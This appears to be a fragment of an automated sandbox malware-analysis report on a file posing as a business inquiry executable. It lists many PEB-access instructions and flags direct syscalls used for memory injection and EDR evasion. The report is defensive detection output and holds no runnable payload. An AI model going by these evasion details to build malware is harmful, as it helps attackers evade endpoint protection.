              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0157E609 mov eax, dword ptr fs:[00000030h]0_2_0157E609
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01536620 mov eax, dword ptr fs:[00000030h]0_2_01536620
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01538620 mov eax, dword ptr fs:[00000030h]0_2_01538620
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0151E627 mov eax, dword ptr fs:[00000030h]0_2_0151E627
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0150262C mov eax, dword ptr fs:[00000030h]0_2_0150262C
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0153A6C7 mov ebx, dword ptr fs:[00000030h]0_2_0153A6C7
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0153A6C7 mov eax, dword ptr fs:[00000030h]0_2_0153A6C7
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0157E6F2 mov eax, dword ptr fs:[00000030h]0_2_0157E6F2
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0157E6F2 mov eax, dword ptr fs:[00000030h]0_2_0157E6F2
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0157E6F2 mov eax, dword ptr fs:[00000030h]0_2_0157E6F2
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0157E6F2 mov eax, dword ptr fs:[00000030h]0_2_0157E6F2
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015806F1 mov eax, dword ptr fs:[00000030h]0_2_015806F1
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015806F1 mov eax, dword ptr fs:[00000030h]0_2_015806F1
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01504690 mov eax, dword ptr fs:[00000030h]0_2_01504690
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01504690 mov eax, dword ptr fs:[00000030h]0_2_01504690
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015366B0 mov eax, dword ptr fs:[00000030h]0_2_015366B0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0153C6A6 mov eax, dword ptr fs:[00000030h]0_2_0153C6A6
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015D4940 mov eax, dword ptr fs:[00000030h]0_2_015D4940
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01580946 mov eax, dword ptr fs:[00000030h]0_2_01580946
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015A4978 mov eax, dword ptr fs:[00000030h]0_2_015A4978
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015A4978 mov eax, dword ptr fs:[00000030h]0_2_015A4978
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0158C97C mov eax, dword ptr fs:[00000030h]0_2_0158C97C
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01526962 mov eax, dword ptr fs:[00000030h]0_2_01526962
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01526962 mov eax, dword ptr fs:[00000030h]0_2_01526962
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01526962 mov eax, dword ptr fs:[00000030h]0_2_01526962
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0154096E mov eax, dword ptr fs:[00000030h]0_2_0154096E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0154096E mov edx, dword ptr fs:[00000030h]0_2_0154096E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0154096E mov eax, dword ptr fs:[00000030h]0_2_0154096E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0158C912 mov eax, dword ptr fs:[00000030h]0_2_0158C912
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_014F8918 mov eax, dword ptr fs:[00000030h]0_2_014F8918
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_014F8918 mov eax, dword ptr fs:[00000030h]0_2_014F8918
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0157E908 mov eax, dword ptr fs:[00000030h]0_2_0157E908
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0157E908 mov eax, dword ptr fs:[00000030h]0_2_0157E908
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0158892A mov eax, dword ptr fs:[00000030h]0_2_0158892A
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0159892B mov eax, dword ptr fs:[00000030h]0_2_0159892B
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0150A9D0 mov eax, dword ptr fs:[00000030h]0_2_0150A9D0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0150A9D0 mov eax, dword ptr fs:[00000030h]0_2_0150A9D0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0150A9D0 mov eax, dword ptr fs:[00000030h]0_2_0150A9D0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0150A9D0 mov eax, dword ptr fs:[00000030h]0_2_0150A9D0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0150A9D0 mov eax, dword ptr fs:[00000030h]0_2_0150A9D0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0150A9D0 mov eax, dword ptr fs:[00000030h]0_2_0150A9D0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015349D0 mov eax, dword ptr fs:[00000030h]0_2_015349D0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015CA9D3 mov eax, dword ptr fs:[00000030h]0_2_015CA9D3
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015969C0 mov eax, dword ptr fs:[00000030h]0_2_015969C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015329F9 mov eax, dword ptr fs:[00000030h]0_2_015329F9
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015329F9 mov eax, dword ptr fs:[00000030h]0_2_015329F9
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0158E9E0 mov eax, dword ptr fs:[00000030h]0_2_0158E9E0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015889B3 mov esi, dword ptr fs:[00000030h]0_2_015889B3
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015889B3 mov eax, dword ptr fs:[00000030h]0_2_015889B3
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015889B3 mov eax, dword ptr fs:[00000030h]0_2_015889B3
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015129A0 mov eax, dword ptr fs:[00000030h]0_2_015129A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015129A0 mov eax, dword ptr fs:[00000030h]0_2_015129A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015129A0 mov eax, dword ptr fs:[00000030h]0_2_015129A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015129A0 mov eax, dword ptr fs:[00000030h]0_2_015129A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015129A0 mov eax, dword ptr fs:[00000030h]0_2_015129A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015129A0 mov eax, dword ptr fs:[00000030h]0_2_015129A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015129A0 mov eax, dword ptr fs:[00000030h]0_2_015129A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015129A0 mov eax, dword ptr fs:[00000030h]0_2_015129A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015129A0 mov eax, dword ptr fs:[00000030h]0_2_015129A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015129A0 mov eax, dword ptr fs:[00000030h]0_2_015129A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015129A0 mov eax, dword ptr fs:[00000030h]0_2_015129A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015129A0 mov eax, dword ptr fs:[00000030h]0_2_015129A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015129A0 mov eax, dword ptr fs:[00000030h]0_2_015129A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015009AD mov eax, dword ptr fs:[00000030h]0_2_015009AD
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015009AD mov eax, dword ptr fs:[00000030h]0_2_015009AD
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01530854 mov eax, dword ptr fs:[00000030h]0_2_01530854
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01504859 mov eax, dword ptr fs:[00000030h]0_2_01504859
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01504859 mov eax, dword ptr fs:[00000030h]0_2_01504859
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01512840 mov ecx, dword ptr fs:[00000030h]0_2_01512840
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01596870 mov eax, dword ptr fs:[00000030h]0_2_01596870
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01596870 mov eax, dword ptr fs:[00000030h]0_2_01596870
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0158E872 mov eax, dword ptr fs:[00000030h]0_2_0158E872
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0158E872 mov eax, dword ptr fs:[00000030h]0_2_0158E872
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0158C810 mov eax, dword ptr fs:[00000030h]0_2_0158C810
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015A483A mov eax, dword ptr fs:[00000030h]0_2_015A483A
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015A483A mov eax, dword ptr fs:[00000030h]0_2_015A483A
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0153A830 mov eax, dword ptr fs:[00000030h]0_2_0153A830
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01522835 mov eax, dword ptr fs:[00000030h]0_2_01522835
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01522835 mov eax, dword ptr fs:[00000030h]0_2_01522835
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01522835 mov eax, dword ptr fs:[00000030h]0_2_01522835
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01522835 mov ecx, dword ptr fs:[00000030h]0_2_01522835
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01522835 mov eax, dword ptr fs:[00000030h]0_2_01522835
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01522835 mov eax, dword ptr fs:[00000030h]0_2_01522835
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0152E8C0 mov eax, dword ptr fs:[00000030h]0_2_0152E8C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015D08C0 mov eax, dword ptr fs:[00000030h]0_2_015D08C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0153C8F9 mov eax, dword ptr fs:[00000030h]0_2_0153C8F9
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0153C8F9 mov eax, dword ptr fs:[00000030h]0_2_0153C8F9
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015CA8E4 mov eax, dword ptr fs:[00000030h]0_2_015CA8E4
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0158C89D mov eax, dword ptr fs:[00000030h]0_2_0158C89D
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01500887 mov eax, dword ptr fs:[00000030h]0_2_01500887
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015AEB50 mov eax, dword ptr fs:[00000030h]0_2_015AEB50
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015D2B57 mov eax, dword ptr fs:[00000030h]0_2_015D2B57
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015D2B57 mov eax, dword ptr fs:[00000030h]0_2_015D2B57
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015D2B57 mov eax, dword ptr fs:[00000030h]0_2_015D2B57
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015D2B57 mov eax, dword ptr fs:[00000030h]0_2_015D2B57
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015B4B4B mov eax, dword ptr fs:[00000030h]0_2_015B4B4B
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015B4B4B mov eax, dword ptr fs:[00000030h]0_2_015B4B4B
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015A8B42 mov eax, dword ptr fs:[00000030h]0_2_015A8B42
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01596B40 mov eax, dword ptr fs:[00000030h]0_2_01596B40
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01596B40 mov eax, dword ptr fs:[00000030h]0_2_01596B40
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015CAB40 mov eax, dword ptr fs:[00000030h]0_2_015CAB40
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_014F8B50 mov eax, dword ptr fs:[00000030h]0_2_014F8B50
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_014FCB7E mov eax, dword ptr fs:[00000030h]0_2_014FCB7E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0157EB1D mov eax, dword ptr fs:[00000030h]0_2_0157EB1D
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0157EB1D mov eax, dword ptr fs:[00000030h]0_2_0157EB1D
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0157EB1D mov eax, dword ptr fs:[00000030h]0_2_0157EB1D
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0157EB1D mov eax, dword ptr fs:[00000030h]0_2_0157EB1D
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0157EB1D mov eax, dword ptr fs:[00000030h]0_2_0157EB1D
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0157EB1D mov eax, dword ptr fs:[00000030h]0_2_0157EB1D
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0157EB1D mov eax, dword ptr fs:[00000030h]0_2_0157EB1D
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0157EB1D mov eax, dword ptr fs:[00000030h]0_2_0157EB1D
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0157EB1D mov eax, dword ptr fs:[00000030h]0_2_0157EB1D
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015D4B00 mov eax, dword ptr fs:[00000030h]0_2_015D4B00
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0152EB20 mov eax, dword ptr fs:[00000030h]0_2_0152EB20
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0152EB20 mov eax, dword ptr fs:[00000030h]0_2_0152EB20
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015C8B28 mov eax, dword ptr fs:[00000030h]0_2_015C8B28
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015C8B28 mov eax, dword ptr fs:[00000030h]0_2_015C8B28
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015AEBD0 mov eax, dword ptr fs:[00000030h]0_2_015AEBD0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01520BCB mov eax, dword ptr fs:[00000030h]0_2_01520BCB
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01520BCB mov eax, dword ptr fs:[00000030h]0_2_01520BCB
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01520BCB mov eax, dword ptr fs:[00000030h]0_2_01520BCB
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01500BCD mov eax, dword ptr fs:[00000030h]0_2_01500BCD
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01500BCD mov eax, dword ptr fs:[00000030h]0_2_01500BCD
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01500BCD mov eax, dword ptr fs:[00000030h]0_2_01500BCD
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01508BF0 mov eax, dword ptr fs:[00000030h]0_2_01508BF0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01508BF0 mov eax, dword ptr fs:[00000030h]0_2_01508BF0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01508BF0 mov eax, dword ptr fs:[00000030h]0_2_01508BF0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0158CBF0 mov eax, dword ptr fs:[00000030h]0_2_0158CBF0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0152EBFC mov eax, dword ptr fs:[00000030h]0_2_0152EBFC
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015B4BB0 mov eax, dword ptr fs:[00000030h]0_2_015B4BB0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015B4BB0 mov eax, dword ptr fs:[00000030h]0_2_015B4BB0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01510BBE mov eax, dword ptr fs:[00000030h]0_2_01510BBE
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01510BBE mov eax, dword ptr fs:[00000030h]0_2_01510BBE
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01506A50 mov eax, dword ptr fs:[00000030h]0_2_01506A50
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01506A50 mov eax, dword ptr fs:[00000030h]0_2_01506A50
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01506A50 mov eax, dword ptr fs:[00000030h]0_2_01506A50
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01506A50 mov eax, dword ptr fs:[00000030h]0_2_01506A50
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01506A50 mov eax, dword ptr fs:[00000030h]0_2_01506A50
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01506A50 mov eax, dword ptr fs:[00000030h]0_2_01506A50
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01506A50 mov eax, dword ptr fs:[00000030h]0_2_01506A50
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01510A5B mov eax, dword ptr fs:[00000030h]0_2_01510A5B
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01510A5B mov eax, dword ptr fs:[00000030h]0_2_01510A5B
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0157CA72 mov eax, dword ptr fs:[00000030h]0_2_0157CA72
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0157CA72 mov eax, dword ptr fs:[00000030h]0_2_0157CA72
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015AEA60 mov eax, dword ptr fs:[00000030h]0_2_015AEA60
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0153CA6F mov eax, dword ptr fs:[00000030h]0_2_0153CA6F
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0153CA6F mov eax, dword ptr fs:[00000030h]0_2_0153CA6F
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0153CA6F mov eax, dword ptr fs:[00000030h]0_2_0153CA6F
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0158CA11 mov eax, dword ptr fs:[00000030h]0_2_0158CA11
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01524A35 mov eax, dword ptr fs:[00000030h]0_2_01524A35
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01524A35 mov eax, dword ptr fs:[00000030h]0_2_01524A35
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0153CA38 mov eax, dword ptr fs:[00000030h]0_2_0153CA38
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0153CA24 mov eax, dword ptr fs:[00000030h]0_2_0153CA24
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0152EA2E mov eax, dword ptr fs:[00000030h]0_2_0152EA2E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01500AD0 mov eax, dword ptr fs:[00000030h]0_2_01500AD0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01534AD0 mov eax, dword ptr fs:[00000030h]0_2_01534AD0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01534AD0 mov eax, dword ptr fs:[00000030h]0_2_01534AD0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01556ACC mov eax, dword ptr fs:[00000030h]0_2_01556ACC
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01556ACC mov eax, dword ptr fs:[00000030h]0_2_01556ACC
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01556ACC mov eax, dword ptr fs:[00000030h]0_2_01556ACC
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0153AAEE mov eax, dword ptr fs:[00000030h]0_2_0153AAEE
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0153AAEE mov eax, dword ptr fs:[00000030h]0_2_0153AAEE
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01538A90 mov edx, dword ptr fs:[00000030h]0_2_01538A90
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0150EA80 mov eax, dword ptr fs:[00000030h]0_2_0150EA80
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0150EA80 mov eax, dword ptr fs:[00000030h]0_2_0150EA80

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Found direct / indirect Syscall (likely to bypass EDR)
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeNtWriteVirtualMemory: Direct from: 0x77762E3CJump to behavior
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeNtMapViewOfSection: Direct from: 0x77762D1CJump to behavior
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeNtNotifyChangeKey: Direct from: 0x77763C2CJump to behavior
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeNtCreateMutant: Direct from: 0x777635CCJump to behavior
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeNtResumeThread: Direct from: 0x777636ACJump to behavior
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeNtProtectVirtualMemory: Direct from: 0x77757B2EJump to behavior
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeNtQuerySystemInformation: Direct from: 0x77762DFCJump to behavior
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeNtAllocateVirtualMemory: Direct from: 0x77762BFCJump to behavior
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeNtReadFile: Direct from: 0x77762ADCJump to behavior
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeNtDelayExecution: Direct from: 0x77762DDCJump to behavior
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeNtWriteVirtualMemory: Direct from: 0x7776490CJump to behavior
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeNtQueryInformationProcess: Direct from: 0x77762C26Jump to behavior
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeNtResumeThread: Direct from: 0x77762FBCJump to behavior
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeNtCreateUserProcess: Direct from: 0x7776371CJump to behavior
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeNtSetInformationThread: Direct from: 0x777563F9Jump to behavior
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeNtAllocateVirtualMemory: Direct from: 0x77763C9CJump to behavior
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeNtSetInformationThread: Direct from: 0x77762B4CJump to behavior
